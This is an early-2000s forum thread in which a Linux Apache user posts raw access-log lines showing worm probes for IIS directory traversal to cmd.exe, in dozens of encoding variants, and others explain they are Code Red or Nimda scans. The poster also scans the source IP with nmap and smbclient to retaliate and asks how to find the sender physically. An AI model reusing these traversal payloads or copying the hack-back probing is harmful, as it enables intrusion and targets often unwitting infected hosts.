MottS Posted December 6, 2002 Report Share Posted December 6, 2002 Hi all I installed Apache to host my webpage about a month ago. Along with Apache I installed Webalizer to get nice and readable statistics from the access_log file. However, if I got get manually in those logs, I get weird stuff.. like if someone tried to execute stuff on my computer. Here it is: 131.164.128.76 - - [06/Dec/2002:05:53:38 -0500] "HEAD / HTTP/1.0" 200 0 "-" "-"131.164.128.76 - - [06/Dec/2002:05:53:39 -0500] "HEAD /MSADC/root.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:41 -0500] "HEAD /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 400 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:42 -0500] "HEAD /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 400 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:44 -0500] "HEAD /PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:46 -0500] "HEAD /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:46 -0500] "HEAD /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 400 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:47 -0500] "HEAD /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 400 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:47 -0500] "HEAD /Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:48 -0500] "HEAD /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:48 -0500] "HEAD /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:49 -0500] "HEAD /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 400 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:49 -0500] "HEAD /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 400 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:49 -0500] "HEAD /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:50 -0500] "HEAD /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:50 -0500] "HEAD /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:51 -0500] "HEAD /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:51 -0500] "HEAD /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:51 -0500] "HEAD /_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:52 -0500] "HEAD /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:52 -0500] "HEAD /adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:53 -0500] "HEAD /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:53 -0500] "HEAD /c/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:54 -0500] "HEAD /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 403 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:54 -0500] "HEAD /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 403 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:55 -0500] "HEAD /d/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:55 -0500] "HEAD /iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:56 -0500] "HEAD /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:56 -0500] "HEAD /msaDC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 400 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:57 -0500] "HEAD /msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 400 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:57 -0500] "HEAD /msaDC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:58 -0500] "HEAD /msaDC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:58 -0500] "HEAD /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 400 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:59 -0500] "HEAD /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 400 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:59 -0500] "HEAD /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:53:59 -0500] "HEAD /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:00 -0500] "HEAD /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:00 -0500] "HEAD /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:00 -0500] "HEAD /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:01 -0500] "HEAD /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:01 -0500] "HEAD /msadc/..%c1%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:02 -0500] "HEAD /msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 400 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:02 -0500] "HEAD /msadc/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 400 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:02 -0500] "HEAD /msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:03 -0500] "HEAD /msadc/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:03 -0500] "HEAD /msadc/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:04 -0500] "HEAD /msadc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:04 -0500] "HEAD /msadc/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:05 -0500] "HEAD /msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:05 -0500] "HEAD /samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:06 -0500] "HEAD /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:06 -0500] "HEAD /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:06 -0500] "HEAD /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:07 -0500] "HEAD /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 400 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:07 -0500] "HEAD /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 400 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:08 -0500] "HEAD /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:08 -0500] "HEAD /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:09 -0500] "HEAD /scripts/..%252f../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:09 -0500] "HEAD /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:10 -0500] "HEAD /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:10 -0500] "HEAD /scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:11 -0500] "HEAD /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:12 -0500] "HEAD /scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:12 -0500] "HEAD /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:13 -0500] "HEAD /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 400 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:14 -0500] "HEAD /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:14 -0500] "HEAD /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 400 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:15 -0500] "HEAD /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:15 -0500] "HEAD /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 400 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:15 -0500] "HEAD /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:16 -0500] "HEAD /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:16 -0500] "HEAD /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 400 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:17 -0500] "HEAD /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:17 -0500] "HEAD /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:17 -0500] "HEAD /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:18 -0500] "HEAD /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:18 -0500] "HEAD /scripts/root.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" 131.164.128.76 - - [06/Dec/2002:05:54:18 -0500] "HEAD /msadc/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 0 "-" "-" So first of all what's that? .. now how can I rehack this guys ? Also how can I prevent those attacks to happens? Thx MOttS Quote Link to comment Share on other sites More sharing options...
Guest LinuxExplorer Posted December 6, 2002 Report Share Posted December 6, 2002 Its funny how they try to take advantage of NT and IIS security exploits.... Quote Link to comment Share on other sites More sharing options...
MottS Posted December 6, 2002 Author Report Share Posted December 6, 2002 ./winnt/system32/cmd.exe?/c+dir+c: Yeah that's funny .. I'd like to hack this guys .. grrrrr MottS Quote Link to comment Share on other sites More sharing options...
Ronin Posted December 6, 2002 Report Share Posted December 6, 2002 ./winnt/system32/cmd.exe?/c+dir+c: Yeah that's funny .. I'd like to hack this guys .. grrrrr MottS I assume you're not running Apache in a windows box? Cause thats the only way that would affect you. Obviously on a linux box these won't work so don't worry about it. Quote Link to comment Share on other sites More sharing options...
cjc Posted December 6, 2002 Report Share Posted December 6, 2002 Now if you can find this guys surface coordinates (ie where his machine is physically)...I have some friends at the Naval SURFACE WAREFARE SCHOOL ...they could use some target practice...not quite as good as hacking, but it would fix the problem. :lol: :lol: :lol: Quote Link to comment Share on other sites More sharing options...
MottS Posted December 6, 2002 Author Report Share Posted December 6, 2002 [root@localhost ScreenShots]# nmap -sS -p 139 131.164.128.76 Starting nmap V. 3.00 ( www.insecure.org/nmap/ ) sendto in send_tcp_raw: sendto(3, packet, 40, 0, 131.164.128.76, 16) => Operation not permitted Interesting ports on 0x83a4804c.arcnxx10.adsl-dhcp.tele.dk (131.164.128.76): Port State Service 139/tcp open netbios-ssn Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds [root@localhost ScreenShots]# nmblookup -A 131.164.128.76Looking up status of 131.164.128.76 INet~Services <1c> - <GROUP> M <ACTIVE> IS~SERVER <00> - M <ACTIVE> SERVER <00> - M <ACTIVE> MSHOME <00> - <GROUP> M <ACTIVE> [root@localhost ScreenShots]# smbclient -L SERVER -I 131.164.128.76added interface ip=10.0.0.10 bcast=10.0.0.255 nmask=255.255.255.0 added interface ip=192.168.1.1 bcast=192.168.1.255 nmask=255.255.255.0 added interface ip=172.16.152.1 bcast=172.16.152.255 nmask=255.255.255.0 session request to SERVER failed (Called name not present) session request to *SMBSERVER failed (Called name not present) I can't connect to this guy :-( Well you have his IP now. What else do you need? How could I know where this guy is physically? What about that? 0x83a4804c.arcnxx10.adsl-dhcp.tele.dk (131.164.128.76) MOttS Quote Link to comment Share on other sites More sharing options...
MottS Posted December 12, 2002 Author Report Share Posted December 12, 2002 I did a bit of research and the only thing we can do is to remove these entries from the log files (the attack itself is harmless on linux host anyway). That can be done easily without much effort. Only have to add a couple of line in the config files here and there. Here are 3 usufull links related to that: http://www.brettglass.com/apacheabuse/index.html http://www.der-keiler.de/Mailing-Lists/sec...02-01/0123.html http://www.webmasterworld.com/forum23/1375.htm Those are 3 different solutions. I'll try them all and tell you which works better. :wink: MOttS Quote Link to comment Share on other sites More sharing options...
Relic2K Posted February 7, 2003 Report Share Posted February 7, 2003 I have seen that traffic many times, including when it initially hit the internet. It is better now as CodeRed, or Nimda variant Worms. You will get scanned by this worm on a daily basis. It is originating from other MS infected Web Servers. You can read up about it at any reliable AV Vendor site. There is a way to fillter it out by putting a line in one of the Apache configuration files. I lost the how to, sometime ago though. Sorry. Quote Link to comment Share on other sites More sharing options...
Steve Scrimpshire Posted February 7, 2003 Report Share Posted February 7, 2003 Exactly...you are just being scanned by tons of other infected Windows boxes looking for other Windows boxes with vulnerabilities. Alot of times these scans come from people that don't even know they are infected. Quote Link to comment Share on other sites More sharing options...
Ronin Posted February 7, 2003 Report Share Posted February 7, 2003 I did a bit of research and the only thing we can do is to remove these entries from the log files (the attack itself is harmless on linux host anyway). That can be done easily without much effort. Only have to add a couple of line in the config files here and there. Here are 3 usufull links related to that:MOttS Humm, thought I mentioned something like this can't hurt your linux box earlier. My logs are full of folks trying to run .exes etc to infect an IIS box. In a sick way its fun to watch them trying. Quote Link to comment Share on other sites More sharing options...
Counterspy Posted February 7, 2003 Report Share Posted February 7, 2003 In the interest of caution, I would run chkrootkit. It can't do any harm. Counterspy Quote Link to comment Share on other sites More sharing options...
AA Posted February 9, 2003 Report Share Posted February 9, 2003 Which version of apache are ya using...? It's recommended to use apache 2... solves a lot of security bugs..!! Quote Link to comment Share on other sites More sharing options...
MottS Posted February 9, 2003 Author Report Share Posted February 9, 2003 Hey guys.. thanks for all your inputs! I use root@localhost root]# httpd -v Server version: Apache-AdvancedExtranetServer/1.3.26 (Mandrake Linux/6mdk) Server built: Sep 6 2002 19:52:32 But it doesn't really matter... I just don't care anymore if my server is attacked or not. Anyway this just fills the log file up.. doesn't do anything else ;-) I'm going to put MDK 9.1 on my server when it will be available. It will probably shiped with Apache 2.x. Thanks all MottS Quote Link to comment Share on other sites More sharing options...
Guest tcreek Posted February 12, 2003 Report Share Posted February 12, 2003 Here is the loacation of that IP address inetnum: 213.130.32.0 - 213.130.63.255netname: UK-VERIO-20001011 descr: Verio Europe descr: Provider Local Registry country: GB admin-c: VIa6-RIPE tech-c: VIa6-RIPE status: ALLOCATED PA mnt-by: RIPE-NCC-HM-MNT mnt-lower: MAINT-VERIOBB mnt-lower: MAINT-VIPAR mnt-routes: MAINT-VERIOBB changed: hostmaster@ripe.net 20001011 changed: hostmaster@ripe.net 20010528 changed: hostmaster@ripe.net 20010605 source: RIPE You can download a 15 day eval copy of VisualRoute and unistall and restall and get another 15 days. It reports that 131.164.128.76 is a node of Verio, whatever that means Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.